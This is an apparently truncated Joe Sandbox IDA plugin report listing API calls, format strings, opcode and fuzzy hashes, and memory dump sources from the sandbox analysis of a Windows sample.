    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: dbc838a92b120a7fbc130a1674ce038df8ae085bd3338e4f58499ae9dc4043a9
    • Instruction ID: 4a0a7da5937e2f93b55463121cd7af174e4f4a253743c22ff7f3c9baf0d35fee
    • Opcode Fuzzy Hash: dbc838a92b120a7fbc130a1674ce038df8ae085bd3338e4f58499ae9dc4043a9
    • Instruction Fuzzy Hash: 49F0966260874742E5529F00BD443B96255AF41795F480237DDED466B1EF3DDA85D300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 1bddf8a2747a8549afddeb8387b95dfedd9771ec2c3498b4b34397f4dff72e22
    • Instruction ID: 408aeb7d213b163e4cb84a62883d2819185f1852732dea68d1db39c3d29a8406
    • Opcode Fuzzy Hash: 1bddf8a2747a8549afddeb8387b95dfedd9771ec2c3498b4b34397f4dff72e22
    • Instruction Fuzzy Hash: 46F0966260874742E5529F00BD443B96255AF41795F480237DDED466B1EF3DD985D300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 229bec4a5c36911d630b63b3a256d301e75d10de5bf91afb2414b1ad6b8ef515
    • Instruction ID: 7e9de4bc390be6521a3ee8cc4e65be97863d758d796b0fca389257ed03b5f372
    • Opcode Fuzzy Hash: 229bec4a5c36911d630b63b3a256d301e75d10de5bf91afb2414b1ad6b8ef515
    • Instruction Fuzzy Hash: D0F09062A0874742E6529F00FD443B96256BF40BA5F48423BEDED466B2EF3DDA89D300
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 032a5fa2ff3fe31508c4440d17476d3f9ed44ed97f6dab76dafaf9c9755de483
    • Instruction ID: 084641b981bcc7d3ccb1af4d88c3d30f6a05845bfa56e370d77a4edcc78e63ee
    • Opcode Fuzzy Hash: 032a5fa2ff3fe31508c4440d17476d3f9ed44ed97f6dab76dafaf9c9755de483
    • Instruction Fuzzy Hash: 90F09663A0874641E6739F10B84037A6694FF447A4F4C0235DDDD466A0DF3DE9899B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 0a1bd016baf32442bcb2f95c380f34f9322c41281c41bd163271b8a54a4b3606
    • Instruction ID: f10de0165794d30d77b16f09282070b9009efc4236f5a31fbcd56c1893257981
    • Opcode Fuzzy Hash: 0a1bd016baf32442bcb2f95c380f34f9322c41281c41bd163271b8a54a4b3606
    • Instruction Fuzzy Hash: 0AF09667A0874641E6739F00B84037A6694FF447A4F480136DD9D466A0DF3DEA899B01
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 4df1374e8eaa2681382dc23643ce7f70a1c10ded32d58ec47fdf7223bde413ea
    • Instruction ID: 8d285780d190c5e4fe4908c7d0bef39fb95b3fb6cee448ade5df1add22a8843f
    • Opcode Fuzzy Hash: 4df1374e8eaa2681382dc23643ce7f70a1c10ded32d58ec47fdf7223bde413ea
    • Instruction Fuzzy Hash: 2DF09663A0874642E6739F40B84037AA694FF447A4F480136DD9D466A0DF3DE9899B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 87cf7a335692aa203f506c9786dcd5f5ca642c99ef475ddadb6e9fe820395f6b
    • Instruction ID: 22e963e37c61893ff76171bf2acca933992e14d2a77228523ddd81bc1e3e691a
    • Opcode Fuzzy Hash: 87cf7a335692aa203f506c9786dcd5f5ca642c99ef475ddadb6e9fe820395f6b
    • Instruction Fuzzy Hash: 26F09663B0874A41E6739F00B84037A6694FF447A5F480235DD9D466A0EF3DE9899B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: dfbb4f9ddf86c67bc9452ba10506b9c36b23fa37de77fcab18f2c0343cb3c22c
    • Instruction ID: ee2c02650b6c6a3645862d79e512d09d4ab11ffc2213c36e4f641fa66cbc6247
    • Opcode Fuzzy Hash: dfbb4f9ddf86c67bc9452ba10506b9c36b23fa37de77fcab18f2c0343cb3c22c
    • Instruction Fuzzy Hash: 93F09663A0874641E6739F00B84037A6694FF447A4F480135DD9D466A0DF3DE9899B00
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: a8c982191d65127c18dc38158ca147da0647e8f512e2d4d5e39173e2e083c8cc
    • Instruction ID: 378acd1066a36744eaa10337bc6e77005615705371108ecc8e08f7bbfb0cd52e
    • Opcode Fuzzy Hash: a8c982191d65127c18dc38158ca147da0647e8f512e2d4d5e39173e2e083c8cc
    • Instruction Fuzzy Hash: B6F0F62371834643E5528F00BC403B6235CAF40794F090636ED1DD6691EF2ED989B309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 38827ecdbc6ec64caf77c70bcdd3837f56e806133f37bc576c4cf501232a091f
    • Instruction ID: 7f3f3071f0c98a51b1dfd9c9e1ea7467be948a0efcca90309adcdc8c5a752bfb
    • Opcode Fuzzy Hash: 38827ecdbc6ec64caf77c70bcdd3837f56e806133f37bc576c4cf501232a091f
    • Instruction Fuzzy Hash: 33F0F62371834643E5528F00B8403B6235CAF40798F090636ED1DD6691EF2ED989B309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: a12f8c7c9d0ae38e3aa8161ea9d6e2f4a0f28f07b01cfff420fb9ff4fdbfa24f
    • Instruction ID: 315241aefcfd13bf3b1a2729b1cbe686c28019a51135f98ffd7eea888943a12b
    • Opcode Fuzzy Hash: a12f8c7c9d0ae38e3aa8161ea9d6e2f4a0f28f07b01cfff420fb9ff4fdbfa24f
    • Instruction Fuzzy Hash: A0F0F62371834643E5528F40B8403B6635CAF40798F090636ED1DD6691EF2ED989B309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: 70ee9f1628cd32528672a16dc1e08cc8e1899a034b130429669a1e0cc08a25bc
    • Instruction ID: 99c7a8884d97c4de0742207dd534f2c968bae8e5fd76ed53bdaef675d8de78d2
    • Opcode Fuzzy Hash: 70ee9f1628cd32528672a16dc1e08cc8e1899a034b130429669a1e0cc08a25bc
    • Instruction Fuzzy Hash: E9F0F62371834643E5528F00BC403B6235CEF40798F090636ED1DD6691EF2ED989B30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
    • API String ID: 1001908780-1680961811
    • Opcode ID: f133ba84cc020c5393658f7875ae71ba30ec1ba0e9edcda9ee4f306665495cec
    • Instruction ID: e2cf5ca869671d63f371e10acde84cf5086090999ce31cbddd8cdf83364e99c7
    • Opcode Fuzzy Hash: f133ba84cc020c5393658f7875ae71ba30ec1ba0e9edcda9ee4f306665495cec
    • Instruction Fuzzy Hash: E3F0F62371834643E6528F00B8403B6235CAF40798F090236ED5DD6691EF2ED989B309
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Sleepmemcpy
    • String ID:
    • API String ID: 1125407320-0
    • Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
    • Instruction ID: 98d8a2ee4d69c00875affee25663e4f075d63f9e5ea8d792c5aea739bc5efc5f
    • Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
    • Instruction Fuzzy Hash: EB31F361B0D702A2FA709B74E88527C7252AF44770F600737D4FD46BF1DE2DA9859640
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Sleepmemcpy
    • String ID:
    • API String ID: 1125407320-0
    • Opcode ID: f41a2fd7c2c62fd8492a237bcc7c73a49ed62abef21106d16d4f36e0309278c3
    • Instruction ID: d33e50599776f7e6110c4612e0a0d131d13a3e55a43f6c52a9741447e194bcfa
    • Opcode Fuzzy Hash: f41a2fd7c2c62fd8492a237bcc7c73a49ed62abef21106d16d4f36e0309278c3
    • Instruction Fuzzy Hash: A1311D20E08E4A97F730DB2BAC442792252AF44378F5407F2D4BD466F6CEEDA9595680
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
    • Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
    • Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
    Similarity
    • API ID: Sleepmemcpy
    • String ID:
    • API String ID: 1125407320-0
    • Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
    • Instruction ID: 45cc18ac62ce454df7f41ca89c3f793da20e04537aeae1d842ef554530e466ce
    • Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
    • Instruction Fuzzy Hash: 0F31FB24B08E4382FB2067E7AC8437B2259AF44770F9017B2E47D866F5DE2DF585A740
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: Sleepmemcpy
    • String ID:
    • API String ID: 1125407320-0
    • Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
    • Instruction ID: 985b0f9191f52c4cc7e640f096d0fbf7d623e228967b429182880ec430768fda
    • Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
    • Instruction Fuzzy Hash: C531FE20E1C60382F6309729E88427D36A2AF45B74F540337D5FE566F7DE3CE9859682
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: Sleepmemcpy
    • String ID:
    • API String ID: 1125407320-0
    • Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
    • Instruction ID: 48dee5e40e92d93aebfb5a3facd0858004955c0ddc495db2b545ac99b7d0b86b
    • Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
    • Instruction Fuzzy Hash: E53106A1E0E70392F6309F2CE8853792261EF44774F640735E4FD46AF5DE2CAA859E40
    APIs
      • Part of subcall function 00007FF6EF651FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF651FEE
    • SleepEx.KERNEL32 ref: 00007FF6EF651A51
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: HandleModuleSleep
    • String ID:
    • API String ID: 1071907932-0
    • Opcode ID: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
    • Instruction ID: 1c059dbebaafef6c51a35a43a3bef2ba5e7445acdd82937ce1ec09fe621c419a
    • Opcode Fuzzy Hash: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
    • Instruction Fuzzy Hash: 4B01F43371C24383F7911694E4503B923BBAB84344F941831E64EDB2C7DE6ED845A306
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: ServiceStatus
    • String ID:
    • API String ID: 3969395364-0
    • Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
    • Instruction ID: 567d902418f02395609d24bf09e30ff29b144daac4d1a341ed10a5618793f3e6
    • Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
    • Instruction Fuzzy Hash: A8D05276D2A602C7E3049F15FCA022033ACBF89380FC48835D00CE2231CE7E612CAB0A
    APIs
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: rand_s
    • String ID:
    • API String ID: 863162693-0
    • Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
    • Instruction ID: c6c13925085424f811da922a4a72365e3b954429cccee3e1add44de2f1076e6a
